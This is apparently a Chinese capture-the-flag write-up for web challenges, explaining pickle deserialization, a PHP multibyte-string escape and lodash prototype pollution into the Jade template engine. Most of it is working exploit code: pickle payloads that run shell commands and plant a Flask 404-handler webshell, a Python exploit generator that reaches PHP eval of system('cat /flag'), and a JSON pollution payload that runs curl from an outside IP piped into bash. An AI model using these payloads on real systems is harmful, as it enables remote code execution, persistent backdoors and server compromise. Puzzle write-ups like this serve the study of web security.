黄河流域挑战赛WEB部分-gxngxngxn

黄河流域公安院校挑战赛WEB部分-gxngxngxn

myfavorPython

pickle反序列话，开启debug，用报错

import os
import pickle
import base64
class A():
    def __reduce__(self):
        return (exec,("raise Exception(__import__('os').popen('cat flag.txt').read())",))

a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

Python-reverse

import os
import pickle
import base64
class A():
    def __reduce__(self):
        return (exec,("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('gxngxngxn')).read()",))

a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

打了以后随便访问一个404页面，然后执行命令即可
具体分析看我flask内存马那篇文章：
https://www.cnblogs.com/gxngxngxn/p/18181936

逃跑大师

mb_strpos与mb_substr执行差异导致的漏洞，参考

https://www.sonarsource.com/blog/joomla-multiple-xss-vulnerabilities/

原理很简单，就是利用mb_strpos与mb_substr这两个函数对某些不可见字符的解析差异导致的

我们本地搭建个环境试验一下:

<?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{
    $start = mb_strpos($data, "[");
    echo $start.'<br>';
    $end = mb_strpos($data, "]");
    echo $end;
    return mb_substr($data, $start, $end + 1 - $start);
}
$key = substrstr($_GET[0]."[welcome".$_GET[1]."sdpcsec]");
echo $key;

这里我们正常传个字符可以看到，这个函数会截区[]里面包裹的内容

增加逃逸出一个字符(抽象的mb_strpos)

但是当我们传入%9f时，

可以看到现在截取的就不一样了，竟然后面少了一个字符，前面多了一个字符，我们可以看到start和end的值为0和15

就是说mb_strpos这个函数在遇到%9f这个不可见字符时，会自动忽略，而mb_substr则不会忽略，导致截断的字符串往前移动了一个位置。

减少逃逸出三个字符(神奇的mb_substr)

再来看%f0两个函数是怎么识别的

可以看到mb_strpos函数是正常当成一个字符识别，但是mb_substr就很神奇了，他会把%f0连着后面的三个字符当成一个字符来识别，所以可以看到这里明显是少了三个字符

构造任意字符

那么简单来说就是%9f用来增加一个字符，%f0用来减少三个字符，我们利用这个特性，可以实现任意字符的构造，如下:

成功构造出gxngxngxn，这里是%f0和%9f配合使用

也可以单独使用%9f来实现逃逸

解题

接下来回归题目本身

 <?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{
    $start = mb_strpos($data, "[");
    $end = mb_strpos($data, "]");
    return mb_substr($data, $start, $end + 1 - $start);
}
class A{
    public $A;
    public $B = "HELLO";
    public $C = "!!!";
    public function __construct($A){
        $this->A = $A;
    }
    public function __destruct(){
        $key = substrstr($this->B . "[welcome sdpcsec" .$this->C . "]");
        echo $key;
        eval($key);
    }
}
if(isset($_POST['escape'])) {
    $Class = new A($_POST['escape']);
    $Key = serialize($Class);
    $K = str_replace("SDPCSEC", "SanDieg0", $Key);
    unserialize($K);
}
else{
    echo "nonono";
} 

这里就是利用了这个原理来构造出任意代码执行，套了一个反序列化字符串逃逸，无伤大雅

直接放我的exp脚本:

import os
import re
import requests
#编码
def encode(string):
    encode_string = ""
    for char in string:
        encode_char = hex(ord(char)).replace("0x","%") #先转ASCII编码再转16进制，把0x替换为%
        # 例如 i+=1 == i=i+1;所以 encode_string = encode_string + encode_char
        encode_string += encode_char # encode_string += 空字符+结果
    return encode_string
#exp
def payload(cmd):
    print("url加密:"+encode(cmd))
    # 请用url全加密后的cmd替换原来的cmd！！！
    cmd1=""
    for i in range(len(cmd)):
        cmd1 += "$"
    cmd = cmd1 + cmd
    s = len(cmd)
    payload1 = '";s:1:"B";s:' + str(s) + ':"' + cmd + '";s:1:"C";s:9:"gxngxngxn";}'
    payload2 = ""
    for i in range(len(payload1)):
        payload2 += 'SDPCSEC'
    payload2 = payload2 + payload1
    payload2 = payload2.replace("$", "%9f")
    print(payload2)

exp=payload('system("cat /flag");//')

将得到字符串中的命令用url全加密后替换即可

Ezzz_Proto

const express = require('express');
const lodash = require('lodash');
const path = require('path');
var bodyParser = require('body-parser');


const app =  express();
var router = express.Router();

app.set('view engine', 'jade');
app.set('views', path.join(__dirname, 'views'));
app.use(bodyParser.json({ extended: true }));


app.get('/',function (req, res) {
    res.send('Hello World');
})

app.post('/post',function (req, res) {
    function merge(target, source) {
        for (let key in source) {
            if (key in source && key in target) {
                merge(target[key], source[key])
            } else {
                target[key] = source[key]
            }
        }
    }
    var malicious_payload = JSON.stringify(req.body);
    var body = JSON.parse(JSON.stringify(req.body));
    var a = {};
    merge(a, JSON.parse(malicious_payload));
    console.log(a.name);
    res.render('index.jade', {
        title: 'HTML',
        name: a.name || ''
    });
})
app.listen(1113, () => console.log('Example app listening on port http://127.0.0.1:1113 !'))

看到引入了jade模板，并且/post路由存在明显的原型链污染，很明显是两个结合打jade模板引擎rce

参考文章:

https://www.anquanke.com/post/id/236354/

利用原文中的exp打打，发现不行，于是跟进底层断点调试

发现在此处将visit换成了visitCode,跟进visitCode函数里

发现这里也存在明显的拼接污染，可以rce，只要污染code.buffer为true，val处拼接我们命令执行的代码即可

payload:

{"__proto__":{"compileDebug":true,"self":true,"buffer":1,"val":"global.process.mainModule.constructor._load('child_process').execSync('curl http://81.70.252.29/1.txt|bash')"}}